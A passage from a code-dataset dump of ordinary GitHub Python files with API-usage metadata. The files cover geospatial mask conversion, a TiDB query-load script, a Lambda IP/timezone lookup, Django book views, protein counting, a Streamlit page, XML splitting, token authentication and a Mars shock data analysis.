"line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "httpx.get", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 73, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 82, "usage_type": "call"}, {"api_name": "httpx.post", "line_number": 90, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 94, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 95, "usage_type": "call"}, {"api_name": 
"datetime.datetime.utcnow", "line_number": 95, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 95, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 99, "usage_type": "call"}, {"api_name": "httpx.post", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 114, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 114, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 116, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "django_utils.delete_session", "line_number": 122, "usage_type": "call"}, {"api_name": "django_utils.delete_session", "line_number": 123, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "74038383483", "text": "# <2021>, by ISB Institute of Data Science\n# Contributors: Dr. Shruti Mantri, Gokul S Kumar and Vishal Sriram\n# Faculty Mentors: Dr. Manish Gangwar and Dr. Madhu Vishwanathan\n# Affiliation: Indian School of Business\n\n# Importing libraries\nimport math\nfrom unicodedata import name\nimport rasterio\nimport glob\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.measure import find_contours\nfrom PIL import Image\nfrom shapely.geometry import mapping,Polygon,MultiLineString,LineString\nfrom shapely import wkt\nimport fiona\nfrom fiona.crs import from_epsg\nimport time\nimport shapely\nimport os\nfrom scipy.sparse import load_npz\nfrom tqdm import tqdm, trange\nimport multiprocessing as mp\nfrom functools import partial\nshapely.speedups.disable()\n\n# Func for converting npz to geojson\ndef npz_to_geojson(mask, city):\n #print(masks)\n z=17\n n = 2**z\n \n xtile=int(mask.split('\\\\')[-1].split('.npz')[0].split('.')[-2])\n ytile=int(mask.split('\\\\')[-1].split('.npz')[0].split('.')[-1])\n \n lon_deg = ((xtile / n)*360.0) - 180.0\n lat_rad = math.atan(math.sinh(math.pi * (1 - (2 * (ytile / n)))))\n lat_deg = lat_rad * (180.0 / math.pi)\n\n tx=rasterio.transform.from_origin(lon_deg,lat_deg,5.323955725076732e-06 ,5.323955725076732e-06)\n \n image=load_npz(mask).toarray()\n\n out=find_contours(image,0.5)\n if not out:\n pass\n else:\n \n cs=[]\n fig, ax = plt.subplots()\n for contour in out: \n cs.append(ax.plot(contour[:, 1], contour[:, 0], linewidth=2))\n \n plt.close()\n poly=[]\n for i in cs:\n \n x=i[0].get_xdata()\n y=i[0].get_ydata()\n aa=rasterio.transform.xy(tx,y,x)\n poly.append(LineString([(i[0], i[1]) for i in zip(aa[0],aa[1])]))\n \n \n list_polygons = [wkt.loads(p.wkt) for p in poly]\n \n mult=shapely.geometry.MultiLineString(list_polygons)\n \n \n \n crs = from_epsg(4326)\n \n schema = {\n 'geometry': 'MultiLineString',\n 'properties': {'id': 'int','Name':'str'},\n \n }\n \n \n \n # Write a new Shapefile\n with fiona.open('../inference/geojsons/{}/'.format(city)+mask.split('\\\\')[-1].split('.npz')[0].split('.')[0]+'.geojson', 'w', 'GeoJSON', schema,crs=crs) as 
c:\n ## If there are multiple geometries, put the \"for\" loop here\n #for ls in list_polygons:\n \n c.write({\n 'geometry': mapping(mult),\n 'properties': {'id': 1,'Name':'Detected Hospital'},\n })\n\nif __name__ == '__main__':\n city_list = os.listdir('../inference/infra_info/predicted/')\n with tqdm(total = len(city_list), desc = 'No. of cities') as pbar1:\n for fname in city_list:\n # Parallelizing by spawning multiple processes\n with mp.Pool(mp.cpu_count() - 11) as pool:\n city_name = os.path.splitext(fname)[0]\n #print(city_name)\n masks = sorted(glob.glob('../inference/preds/{}/*'.format(city_name)), key=lambda x:float(re.findall(\"(\\d+)\",x)[0]))\n if not os.path.exists('../inference/geojsons/{}'.format(city_name)):\n os.makedirs('../inference/geojsons/{}'.format(city_name))\n with tqdm(total = len(masks), desc = '{} progress'.format(city_name)) as pbar2:\n temp = partial(npz_to_geojson, city = city_name)\n #print(masks)\n for i, _ in enumerate(pool.imap_unordered(func = temp, iterable = masks)):\n pbar2.update()\n os.rename('../inference/infra_info/predicted/{}'.format(fname), '../inference/infra_info/geojsons/{}'.format(fname))\n pbar1.update(1)\n \n# Ref: https://github.com/geospoc/rural-school-mapper", "repo_name": "Gokul-S-Kumar/Hospital_detection_from_aerial_images", "sub_path": "src/npz_to_geojsons.py", "file_name": "npz_to_geojsons.py", "file_ext": "py", "file_size_in_byte": 3906, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "shapely.speedups.disable", "line_number": 27, "usage_type": "call"}, {"api_name": "shapely.speedups", "line_number": 27, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sinh", "line_number": 39, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 39, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "rasterio.transform.from_origin", "line_number": 42, "usage_type": "call"}, {"api_name": "rasterio.transform", "line_number": 42, "usage_type": "attribute"}, {"api_name": "scipy.sparse.load_npz", "line_number": 44, "usage_type": "call"}, {"api_name": "skimage.measure.find_contours", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "rasterio.transform.xy", "line_number": 62, "usage_type": "call"}, {"api_name": "rasterio.transform", "line_number": 62, "usage_type": "attribute"}, {"api_name": "shapely.geometry.LineString", "line_number": 63, "usage_type": "call"}, {"api_name": "shapely.wkt.loads", "line_number": 66, "usage_type": "call"}, {"api_name": "shapely.wkt", "line_number": 66, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiLineString", "line_number": 68, "usage_type": "call"}, {"api_name": "shapely.geometry", "line_number": 68, "usage_type": "attribute"}, {"api_name": "fiona.crs.from_epsg", "line_number": 72, "usage_type": "call"}, {"api_name": "fiona.open", "line_number": 83, "usage_type": "call"}, {"api_name": "shapely.geometry.mapping", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 94, 
"usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 97, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 100, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 103, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 104, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "9655882472", "text": "\"\"\"\n- 模拟查询tidb 集群 tidb 集群中已经创建了test database 以及user表\n- 该脚本只能在tidb同一个k8s 集群中跑,否则网络则不通\n\n\"\"\"\n\nimport time\nimport pymysql\nimport datetime\nimport os\n\n\ndef main():\n start = time.time()\n print(\"Starting connect to tidb....\")\n db = pymysql.connect(host='basic-tidb.tidb-cluster.svc.cluster.local',\n port=4000,\n user='root',\n database='test')\n print(\"Connected to tidb....\")\n cursor = db.cursor()\n now = datetime.datetime.now()\n minute = now.minute\n # 读取出先前分钟数的第一位 如 18:30分钟 则 t1 = 3\n t1 = int(str(minute)[0])\n # 计算当前分钟数第二位 然后默认 * 1000 如 18:35分 则 5 * 1000\n times = (minute % 10) * os.getenv(\"TIMES\", 1000)\n if (t1 % 2) == 0:\n # 为了让请求呈正弦分布,这里让times对称\n times = (10 - (minute % 10)) * os.getenv(\"TIMES\", 1000)\n print(\"time: \" + now.strftime(\"%Y-%m-%d %H:%M:%S\") + \" times: \", str(times))\n while times > 0:\n cursor.execute(\"SELECT * from `app_user` limit 1\")\n data = cursor.fetchall()\n times -= 1\n end = time.time()\n print(\"fetch data success,use time seconds=\" + str(end - start))\n db.close()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "MetricsAD/tidb-qps-test", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1358, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 27, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "26358216134", "text": "import requests\nimport json\ndef lambda_handler(event, context):\n version = context.function_version\n ipaddress = requests.get('http://ip.42.pl/raw').text\n suburl = requests.get('http://worldtimeapi.org/api/ip/'+ipaddress+'.json').text\n y = json.loads(suburl)\n y['version'] = version\n print(json.dumps(y))\n \n return {\n 'statusCode': 200,\n 'body': json.dumps(y)\n }\n", "repo_name": "iamfavas/task_on_pipeline", "sub_path": "lambda_function.py", "file_name": "lambda_function.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, 
{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 7, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "34236655753", "text": "from django.shortcuts import render, redirect\nfrom . models import Book, Author\n\n# Create your views here.\n\ndef index(request):\n return redirect('/books')\n\ndef books(request):\n books = Book.objects.all()\n context = {\n 'books': books\n }\n return render(request, 'books.html', context)\n\ndef catalog_books(request):\n Book.objects.create(\n title = request.POST['book_title'],\n description = request.POST['book_description'],\n )\n return redirect('/books')\n\ndef display_books(request, book_id):\n correct_book = Book.objects.get(id = book_id)\n context = {\n 'book_id' : correct_book\n }\n return render(request, \"view_books.html\", context)\n\ndef authors(request):\n authors = Author.objects.all()\n context = {\n 'authors': authors\n }\n return render(request, 'authors.html', context)\n\ndef catalog_authors(request):\n Author.objects.create(\n first_name = request.POST['author_first_name'],\n last_name = request.POST['author_last_name'],\n notes = request.POST['author_notes'],\n )\n return redirect('/authors')\n", "repo_name": "JustonSmith/Coding_Dojo", "sub_path": "python_stack/learn_assignments/books_authors_env/books_authors_project/books_authors_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1104, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 7, "usage_type": "call"}, {"api_name": "models.Book.objects.all", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Book.objects.create", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Book.objects.get", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Author.objects.all", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Author.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Author", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Author.objects.create", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Author.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Author", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "15678892004", "text": "from Bio import SeqIO\nfrom Bio.SeqUtils.ProtParam import ProteinAnalysis\n\n# functions\ndef aa_count(filename, filetype):\n res_dict 
= {}\n f = open(filename)\n for record in SeqIO.parse(f, filetype):\n temp_dict = ProteinAnalysis(str(record.seq)).count_amino_acids()\n for key, val in temp_dict.items():\n if key in res_dict:\n res_dict[key] = res_dict[key] + val\n else:\n res_dict[key] = val\n return res_dict\n\ndef print_results(data_name, data_dict):\n print(f\"Results for {data_name}\")\n print(f\"Most frequent AA: {max(data_dict, key=data_dict.get)}\")\n print(f\"Least frequent AA: {min(data_dict, key=data_dict.get)}\")\n print(f\"Complete AA count:\")\n for key, val in data_dict.items():\n print(key, val)\n print()\n\n# generate aa count dictionaries for refseq and swissprot files\nrefseq = aa_count('human.protein.fasta', \"fasta\")\nswissprot = aa_count('uniprot_sprot_human.dat', \"swiss\")\n\n# print statements\nprint_results(\"RefSeq Human Proteins File ('human.protein.fasta')\", refseq)\nprint_results(\"SwissProt Human Proteins File ('human.protein.fasta')\", swissprot)\n", "repo_name": "greenkidneybean/bchb524", "sub_path": "lec/12/12.1.py", "file_name": "12.1.py", "file_ext": "py", "file_size_in_byte": 1154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 8, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 8, "usage_type": "name"}, {"api_name": "Bio.SeqUtils.ProtParam.ProteinAnalysis", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "72597249724", "text": "import streamlit as st\nimport pandas as pd\nimport io\nfrom PIL import Image\nimport base64\n\nst.set_page_config(page_title=\"New Meeting\") \n\nst.title(\"New Meeting\")\n\n# file = open(\"../images/peak logo.png\", \"rb\")\n# contents = file.read()\n# img_str = base64.b64encode(contents).decode(\"utf-8\")\n# buffer = io.BytesIO()\n# file.close()\n# img_data = base64.b64decode(img_str)\n# img = Image.open(io.BytesIO(img_data))\n# resized_img = img.resize((150, 60)) # x, y\n# resized_img.save(buffer, format=\"PNG\")\n# img_b64 = base64.b64encode(buffer.getvalue()).decode(\"utf-8\")\n\nst.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\naudio , text, table = st.tabs([\"Audio\", \"Text\", \"Table\"])\n\nwith audio:\n col1, col2, col3 = st.columns([0.45, 0.10, 0.45])\n\n with col1:\n st.write(\"Record your voice:\")\n voice_start_recording_button = st.button(\"Start Recording\")\n with col3:\n st.write(\"Upload your meeting recording: \")\n uploaded_file = st.file_uploader(\" \")\n\n\nwith text:\n text_area_text = st.text_area('Write something to be added to the meeting minute table', key='text_area_text')\n text_add_button = st.button('Add', key='text_add_button')\n\nwith table:\n uploaded_file = st.file_uploader(\"Upload Excel file\", type=[\"xlsx\"])\n # excel_add_button = st.button('Add', key='excel_add_button')\n\n\n", "repo_name": "YusufEmad04/hackathon2", "sub_path": "pages/4 - New Meeting.py", "file_name": "4 - New Meeting.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "streamlit.set_page_config", "line_number": 7, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 9, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.tabs", 
"line_number": 50, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 56, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 57, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 59, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.text_area", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "22695982968", "text": "import os, sys\nfrom xml.etree import ElementTree as ET\n\ndef split_file(filename):\n base_name, extension = filename.rsplit('.', 1)\n tree = ET.parse(filename)\n root = tree.getroot()\n middle_idx = len(root) // 2\n\n write_file(f'{base_name}_1.{extension}', root[:middle_idx + 1])\n write_file(f'{base_name}_2.{extension}', root[middle_idx + 1:])\n\ndef write_file(filename, elements):\n with open(filename, 'wb') as file:\n file.write(b'')\n for element in elements:\n file.write(ET.tostring(element, encoding='utf-8').strip())\n file.write(b'')\n \n validate_and_info(filename)\n\ndef validate_and_info(file_name):\n try:\n tree = ET.parse(file_name)\n print(f\"{file_name} is a valid XML file.\")\n events_count = len(tree.findall('.//event'))\n print(f\"Number of events in {file_name}: {events_count}\")\n file_size_MB = os.path.getsize(file_name) / (1024 * 1024)\n print(f\"File size of {file_name}: {file_size_MB:.2f} MB\\n\")\n except ET.ParseError:\n print(f\"{file_name} is not a valid XML file.\")\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n split_file(filename)\n", "repo_name": "krabello/XML-Splitter", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1222, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 6, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 6, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 17, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 17, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 24, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.getsize", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 30, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "34239555572", "text": "\"\"\"Authentication and authorization process.\"\"\"\nimport datetime\nimport logging\nfrom exer_user_link.adapters.repositories import TokenRepository, UserRepository\nfrom exer_user_link.domains import Token\nfrom typing import Union\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass AuthService():\n \"\"\"Auth service to generate and verify tokens.\"\"\"\n\n def __init__(self, token_repository: TokenRepository, user_repository: UserRepository):\n self._token_repository = token_repository\n self._user_repository = user_repository\n\n 
def authenticate(self, user_id: str, password: str) -> Union[None, Token]:\n \"\"\"Authentication function.\"\"\"\n logger.info(f'Authentication {user_id}')\n user = self._user_repository.find_by_userid(user_id)\n if not user:\n return None\n if user.password != password:\n return None\n token_value = self._generate_new_token(user_id)\n return Token(userid=user_id, value=token_value)\n\n def verify(self, token: Token) -> bool:\n \"\"\"Verificationfunction.\"\"\"\n logger.info(f'Verifying {str(token.value)}')\n restored_token = self._token_repository.find_by_value(token.value)\n if not restored_token:\n return False\n if not restored_token.userid == token.userid:\n return False\n if (datetime.datetime.now() - restored_token.current_date) >= datetime.timedelta(minutes=5):\n self._token_repository.remove(restored_token)\n return False\n restored_token.uses += 1\n # avoid magic number\n if restored_token.uses < 5:\n self._token_repository.update(restored_token)\n else:\n # correct token but removed from the db.\n self._token_repository.remove(restored_token)\n return True\n\n def _generate_new_token(self, user_id: str) -> str:\n token = Token(user_id)\n self._token_repository.save(token)\n return token.value\n", "repo_name": "carlosb1/projects-python", "sub_path": "exercises/exer-user-link/exer_user_link/services/auth_service.py", "file_name": "auth_service.py", "file_ext": "py", "file_size_in_byte": 2007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "exer_user_link.adapters.repositories.TokenRepository", "line_number": 15, "usage_type": "name"}, {"api_name": "exer_user_link.adapters.repositories.UserRepository", "line_number": 15, "usage_type": "name"}, {"api_name": "exer_user_link.domains.Token", "line_number": 28, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 19, "usage_type": "name"}, {"api_name": "exer_user_link.domains.Token", "line_number": 19, "usage_type": "name"}, {"api_name": "exer_user_link.domains.Token", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 38, "usage_type": "call"}, {"api_name": "exer_user_link.domains.Token", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "39925220375", "text": "# 0 uso modulo desde otro modulo\n# 1 uso modulo y quiero que me haga plots y los guarde\nMODO_hipotesisMHD = 0\n\n\nfrom mag import shock_date\nfrom delimitacionshock import B, t_mag\nfrom delimitacionshock import t_swia_mom, densidad_swia, temperatura_swia_norm, t_swea, flujosenergia_swea, nivelesenergia_swea\nfrom delimitacionshock import Bu, Bd, norm_Bu, norm_Bd, Vu, Vd, iu_v, fu_v, id_v, fd_v\nfrom subestructuras_calculos_2 import N\n\n\nfrom importlib import reload\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sympy.solvers import solve\nfrom sympy import Symbol\nimport scipy \nfrom scipy import optimize\n\n\n\npath_analisis = r'C:\\Users\\sofia\\Documents\\Facultad\\Tesis\\Analisis/{}/'.format(shock_date)\nif not os.path.exists(path_analisis):\n os.makedirs(path_analisis)\n\n#%%----------------------------------- FUNCIONES 
GENERALES -------------------------------------------\n \n#para calcular Te \ndef Te(ind_t_Te, Emin_fit, Emax_fit, amp0, mu0, sigma0, dist_e, energ, t):\n \n '''\n ind_t_Te es indice del tiempo (up/down) en el que fijo la distribucion de electrones\n Emin_fit y Emax_fit son los limites de energias en donde hago el ajuste\n gaussiano\n amp0, mu0, sigma0 son los parametros iniciales del fit\n '''\n \n \n #selecciono rango de energias donde hacer el ajuste (energias van de mayor a menor)\n ind_Emin_fit = (abs(energ - Emin_fit)).argmin()\n ind_Emax_fit = (abs(energ - Emax_fit)).argmin()\n \n \n #defino funcion gaussiana\n def gaussiana(x,a,x0,sigma):\n return a*np.exp(-(x-x0)**2/(2*sigma**2))\n \n \n #fit gaussiano de los datos\n params, cov = scipy.optimize.curve_fit(gaussiana,\n energ[ind_Emax_fit:ind_Emin_fit], dist_e[ind_t_Te,ind_Emax_fit:ind_Emin_fit], [amp0,mu0,sigma0])\n \n f_gauss = gaussiana(energ, params[0], params[1], params[2])\n \n #calculo ancho altura mitad\n aam = max(f_gauss)/2\n \n #estimo Te como energia donde se da el aam\n ind_aam = (abs(f_gauss - aam)).argmin()\n Te = energ[ind_aam]\n \n return Te, ind_aam, aam, f_gauss, params, ind_Emin_fit, ind_Emax_fit\n\n#%%#####################################################################################################\n########################################################################################################\n########################################################################################################\n########################################################################################################\n#%%\n#plot de densidad y B para ver que es un shock rapido\n\n \nif MODO_hipotesisMHD == 1:\n \n \n figsize = (30,15)\n msize = 8\n lw = 1\n font_label = 30\n font_leg = 26\n ticks_l = 6\n ticks_w = 3\n \n xarrow_B = 9.75 #*\n xarrow_rho = 9.70 #*\n xlim_B = np.array([t_mag[3020], t_mag[4244]]) #*\n xlim_rho = np.array([t_swia_mom[755], t_swia_mom[1060]]) #*\n ylim_B = 50 #*\n ylim_rho = 200 #*\n \n \n den_u = np.mean(densidad_swia[min(iu_v,fu_v):max(iu_v,fu_v)])\n den_d = np.mean(densidad_swia[min(id_v,fd_v):max(id_v,fd_v)])\n \n saltoB = norm_Bd/norm_Bu\n saltorho = den_d/den_u\n \n f2, plot1 = plt.subplots(figsize = figsize)\n f2.taight_layout = True\n \n gr1, = plot1.plot(t_mag, B, linewidth = lw, color = 'C0', label = '$B$')\n plot1.axhline(y = norm_Bu, linewidth = lw, color = 'C1')\n plot1.axhline(y = norm_Bd, linewidth = lw, color = 'C1')\n plot1.annotate('', xy=(xarrow_B, norm_Bd), xycoords='data', xytext=(xarrow_B, norm_Bu), textcoords='data', arrowprops=dict(arrowstyle='<->', connectionstyle='arc3', color='C1', lw=lw))\n plot1.text(xarrow_B-0.01, (norm_Bd + norm_Bu)/2, 'Bd:Bu = {}'.format(int(saltoB)), rotation = 90, verticalalignment='center', fontsize = font_leg, color = 'C1', bbox=dict(facecolor='white', edgecolor='None', alpha=1))\n plot1.set_xlabel('Tiempo\\n[hora decimal]', fontsize = font_label)\n plot1.set_ylabel('B\\n[nT]', fontsize = font_label)\n plt.xlim(xlim_B)\n plt.ylim(ymax = ylim_B)\n plot1.axes.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n plot1.axes.grid(axis = 'both', which = 'both', alpha = 0.8, linewidth = lw, linestyle = '--')\n \n \n plot2 = plt.twinx(plot1)\n gr2, = plot2.plot(t_swia_mom, densidad_swia, linewidth = lw, color = 'C2', label = '$n_p$')\n plot2.axhline(y = den_u, linewidth = lw, color = 'C3')\n plot2.axhline(y = den_d, linewidth = lw, color = 'C3')\n plt.annotate('', xy=(xarrow_rho, den_d), 
xycoords='data', xytext=(xarrow_rho, den_u), textcoords='data', arrowprops=dict(arrowstyle='<->', connectionstyle='arc3', color='C3', lw=lw))\n plt.text(xarrow_rho-0.01, (den_d + den_u)/2, 'nd:nu = {}'.format(int(saltorho)), rotation = 90, verticalalignment='center', fontsize = font_leg, color = 'C3', bbox=dict(facecolor='white', edgecolor='None', alpha=1))\n plt.xlim(xlim_rho)\n plt.ylim(ymax = ylim_rho)\n plot2.set_ylabel('$n_p$\\n[$cm^{-3}$]', fontsize = font_label)\n plot2.axes.tick_params(axis = 'y', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n \n plot1.legend(handles = [gr1,gr2], loc = 0, fontsize = font_leg)\n \n f2.savefig(path_analisis+'fast_shock_{}'.format(shock_date))\n f2.savefig(path_analisis+'fast_shock_{}.pdf'.format(shock_date))\n\n#%%\n# \n##compute Te\n# \n##plot the e- distribution vs energy at fixed t to choose the fit parameters and region\n#\n#tu_Te = 9.75 #*\n#td_Te = 9.92 #*\n#\n#ind_tu_Te = (abs(t_swea - tu_Te)).argmin()\n#ind_td_Te = (abs(t_swea - td_Te)).argmin()\n#\n#\n#\n#if MODO_hipotesisMHD == 1:\n# \n# figsize = (30,15)\n# font_title = 30\n# font_label = 30\n# font_leg = 26\n# lw = 3\n# msize = 8\n# colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n# ticks_l = 6\n# ticks_w = 3\n# grid_alpha = 0.8\n# \n# ylim_min_u = 1e6\n# ylim_min_d = 1e6\n# \n# \n# plt.figure(11, figsize = figsize)\n# \n# plt.subplot(121)\n# plt.title(r' Upstream - t = {} hora decimal'.format(round(t_swea[ind_tu_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_tu_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.yscale('log')\n# plt.xscale('log')\n# plt.ylabel(r'Distribución de 